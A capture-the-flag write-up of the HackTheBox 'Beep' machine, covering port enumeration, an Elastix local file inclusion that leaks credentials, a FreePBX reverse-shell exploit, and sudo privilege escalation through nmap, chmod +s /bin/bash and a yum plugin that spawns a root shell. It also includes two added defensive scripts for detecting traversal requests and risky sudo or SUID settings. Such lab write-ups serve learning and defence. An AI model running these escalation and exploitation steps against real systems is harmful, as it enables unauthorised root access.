HackTheBox — Beep : Unfinished…

mrZud0k0rn
8 min read · Apr 4, 2021


Rated as easy on HTB, and the machine runs Linux. I have added the IP to my /etc/hosts file, so let's dive in.

Start by scanning for the open ports we can work on. I always run both a masscan and an nmap port scan for good measure.

masscan -i tun0 -p0-65535 --interactive 10.10.10.7

nmap -p- --stylesheet /opt/nmap-bootstrap-xsl/nmap-bootstrap.xsl -oA nmap/portScan beep.htb

So we have 16 open ports. That is a lot of enumeration, and since the box is rated easy, perhaps we will find multiple vulnerabilities we can exploit?

Let's run autorecon by Tib3rius:

autorecon beep.htb

While autorecon is running, let's also run an nmap version/script scan:

nmap -sV -sC -p4559,80,993,143,443,995,25,110,3306,5038,878,111,4190,4445,10000,22 --stylesheet /opt/nmap-bootstrap-xsl/nmap-bootstrap.xsl -oA nmap/detailedScan beep.htb -vv

Summarizing the ports:

Port 22 : OpenSSH 4.3 (protocol 2.0)
Port 25 : Postfix smtpd
Port 80/443 : Apache httpd 2.2.3 (CentOS)
Port 110 : pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
Port 111 : RPC Port
Port 143 : Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
Port 878 : RPC Port
Port 993 : Cyrus imapd
Port 995 : Cyrus pop3d
Port 3306 : MySQL
Port 4190 : Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
Port 4445 : upnotifyp?
Port 4559 : HylaFAX 4.3.10
Port 5038 : Asterisk Call Manager 1.1
Port 10000 : MiniServ 1.570 (Webmin httpd)

That's a lot of ports and I didn't know where to begin, so I read through the autorecon results; the ports that stood out to me were:

Port 25 : Postfix smtpd
Port 80/443 : Apache httpd 2.2.3 (CentOS)
Port 5038 : Asterisk Call Manager 1.1
Port 10000 : MiniServ 1.570 (Webmin httpd)

Port 80/443

Visiting port 80 redirected me to port 443, where the login page mentions Elastix. I don't have credentials on hand yet.

>insert welcome page here<

Since it was rated easy, I figured there might already be public exploits available against the application.

So I searched for the keyword "elastix" in searchsploit:

searchsploit elastix

Multiple exploits were found: a couple of XSS exploits, which we are not interested in for now, and, what stood out for me, an LFI (local file inclusion) and an RCE (remote code execution).

Let's copy those exploits to our present working directory.

LFI

searchsploit -m php/webapps/37637.pl

Reading through the exploit, it mentions the directory "vtigercrm",

which I believe was not found by the gobuster run inside autorecon.

I ran the exploit and supplied the target IP, but it didn't work.

So I manually put the URL in my browser with Burp running,

and I successfully exploited the LFI vulnerability; reading through the response, we recovered some credentials.

One obvious thing about the file is that it reuses the same password for all the accounts inside it.

Let's take note of the password for now, and see if we can read the /etc/passwd and /etc/shadow files.

I successfully read /etc/passwd, but had no luck with /etc/shadow.

So right now we have some credentials on hand, but we still need a reverse shell or some other remote connection to the server as our initial foothold.
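An added example from the defending side, not part of the original write-up: a small shell script that flags Apache access-log lines matching the kind of directory-traversal request used above. The log lines, the 10.10.14.x client addresses and the file= parameter under /vtigercrm/ are constructed fixtures, not traffic captured from the box.

```shell
#!/bin/sh
# Added example, not from the original write-up: flag Apache access-log lines
# that look like the directory-traversal LFI attempts described above.
# The log lines, the client IP 10.10.14.5 and the "file=" parameter under
# /vtigercrm/ are all constructed fixtures.

SAMPLE_LOG='10.10.14.5 - - [04/Apr/2021:10:01:02 +0000] "GET /vtigercrm/index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.10.14.5 - - [04/Apr/2021:10:01:09 +0000] "GET /vtigercrm/page.php?file=../../../../etc/passwd HTTP/1.1" 200 3811 "-" "Mozilla/5.0"
10.10.14.5 - - [04/Apr/2021:10:01:15 +0000] "GET /vtigercrm/page.php?file=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 18 "-" "Mozilla/5.0"
10.10.14.9 - - [04/Apr/2021:10:02:00 +0000] "GET /index.php HTTP/1.1" 302 0 "-" "curl/7.68.0"'

# Read a log on stdin and print the lines whose request contains a traversal
# sequence (raw "../" or its URL-encoded forms, any letter case) or names one
# of the two files the write-up reads through the LFI.
detect_lfi() {
    grep -iE '(\.\./|\.\.%2f|%2e%2e(/|%2f)|/etc/(passwd|shadow))'
}

# Number of suspicious requests in the constructed sample.
count_lfi_hits() {
    printf '%s\n' "$SAMPLE_LOG" | detect_lfi | wc -l | tr -d ' '
}

# Distinct client IPs that sent them (first field of the combined log format).
lfi_sources() {
    printf '%s\n' "$SAMPLE_LOG" | detect_lfi | awk '{print $1}' | sort -u
}

# Run against the sample; on a real host pipe the access log in instead:
#   detect_lfi < /var/log/httpd/access_log
printf 'suspicious requests: %s\n' "$(count_lfi_hits)"
printf 'sources: %s\n' "$(lfi_sources)"
```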

RCE

Also in the searchsploit list is a Python exploit leading to RCE; we can use it to make the target machine throw a reverse shell back to us.

We can get the PBX version by going to /admin and entering credentials multiple times: it tells us we are not authorized, but it reveals the application version.

We got FreePBX 2.8.1.4, while the exploit we found is for a later version, FreePBX 2.10.x.

So I downloaded the file:

searchsploit -m <path-of-exploit>

searchsploit -m php/webapps/18650.py

Opening the file, we can see that we need to change some parameters, and the command inside the file tells us that the exploit runs a reverse shell on the target machine.

The file also gives a hint on how to root the machine. Sweet!

I changed the IPs and port so I could get a remote connection, and opened a netcat listener to catch the reverse shell, but upon running the script...

I got an error about an unsupported protocol. Googling the error led me to something about the SSL version of my target versus mine.

So I ran sslscan against the box: it only offers SSLv3 and TLSv1.0, relatively old technology.

I edited my /etc/ssl/openssl.cnf file, changing two parameters: the minimum protocol and the cipher string.

I set them to none, so my machine would accept and talk to old and insecure SSL/TLS versions.

I ran the exploit again and now got a new error about my target's certificate.

Googling the error led me to change the script again: I added "import ssl" and then added this line to the script

So I ran the exploit again; this time I got no error, but I also got no response. I now thought this had something to do with the extension parameter in the script.

Googling about PBX extensions, I found this article about hacking PBX phones helpful, hence the box name 'Beep'.

Luckily we have the svwar tool installed.

I issued the command:

svwar -e 100-999 -m INVITE 10.10.10.7

and I got results with a 'weird' response but one 'reauth'; maybe this was the extension we could use for our exploit.

I edited the exploit again so that it now looks something like this:

I ran the exploit and finally, this time, I got a reverse shell!

Privilege Escalation

Let's spawn a more interactive shell by issuing:

python -c 'import pty;pty.spawn("/bin/bash")'

Now that we have a more interactive shell, let's run sudo -l:

sudo -l

There are a lot of possible ways to privesc.

Visit the GTFOBins website for how to exploit those binaries. Let's try the hint in our script and a couple of the binaries.

NMAP

Run nmap with the '--interactive' flag, then escape from nmap with elevated privileges by issuing '!sh':

sudo nmap --interactive

CHMOD

This is pretty straightforward: we could change the file permissions of /etc/passwd and /etc/shadow and insert a backdoor account or crack the passwords.

But let's instead change the permissions of the bash binary: set the SUID bit and spawn a persistent elevated shell.

Set the SUID bit with:

sudo /bin/chmod +s /bin/bash

then get a persistent elevated shell with /bin/bash -p

YUM

Checking the binary…

It says here that we can create a temp folder, put in some files with plugin configuration, and in the plugin itself insert the "os.execl('/bin/sh', '/bin/sh')" line, which spawns an elevated shell.

TF=$(mktemp -d)            # create a temporary directory
cat >$TF/x<<EOF            # create a file named 'x' inside $TF (the yum config)
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF       # plugin config that enables the 'y' plugin
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF         # the plugin itself: replaces yum with /bin/sh from the init hook
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF

After making the necessary files, we execute yum with:

sudo yum -c $TF/x --enableplugin=y

and we are root again!
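An added example, not from the original write-up, that audits a host for the two conditions the nmap, chmod and yum tricks above depend on: sudo rules granting those binaries, and a shell binary left with the SUID bit set. The sudo -l listing and the user name in it are constructed, and the SUID fixture is a throwaway temp directory, not a real system path.

```shell
#!/bin/sh
# Added example, not from the original write-up: a small audit for the two
# conditions the privilege-escalation section relies on, namely sudo rules
# that allow nmap, chmod or yum (each escapable to a root shell, per GTFOBins)
# and a shell binary carrying the SUID bit (what "chmod +s /bin/bash" leaves
# behind). The "sudo -l" listing and the user name are constructed samples.

RISKY_BINS='nmap|chmod|yum'
SAMPLE_SUDO_L='User sampleuser may run the following commands on this host:
    (root) NOPASSWD: /sbin/reboot
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/ls'

# Read "sudo -l" output on stdin and print the rules granting a risky binary.
risky_sudo_rules() {
    grep -E "/($RISKY_BINS)([[:space:]]|,|$)"
}

# Number of risky rules in the constructed sample.
count_risky_rules() {
    printf '%s\n' "$SAMPLE_SUDO_L" | risky_sudo_rules | wc -l | tr -d ' '
}

# Number of SUID files under DIR whose name is a common shell. On a live host
# run it against / (as root, so unreadable directories do not add noise).
count_suid_shells() {
    find "$1" -type f -perm -4000 \
        \( -name bash -o -name sh -o -name dash -o -name zsh \) 2>/dev/null \
        | wc -l | tr -d ' '
}

# Self-contained fixture: a throwaway directory holding an empty file named
# "bash" with mode 4755; the check runs against it and then cleans up.
demo_suid_check() {
    d=$(mktemp -d)
    : > "$d/bash"
    chmod 4755 "$d/bash"
    count_suid_shells "$d"
    rm -rf "$d"
}

# Remediation is the inverse of the write-up's steps: drop the risky entries
# from /etc/sudoers (via visudo) and clear the bit with "chmod u-s /bin/bash".
printf 'risky sudo rules: %s\n' "$(count_risky_rules)"
printf 'suid shells in fixture: %s\n' "$(demo_suid_check)"
```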

Grab the flags.


NOTE: I will try to add more exploit vectors; I want to learn about the other ports listed above, so I am setting a reminder to work on them and learn new things in my free time :)

Takeaways :

  1. Enumeration is not only about enumerating the target machine's files, ports and services; it is also about enumerating the possible exploits against the machine/application/service you are working on. I would like to remind myself to spend time reading the scripts and exploits.

Note: more takeaways as I finish the box..
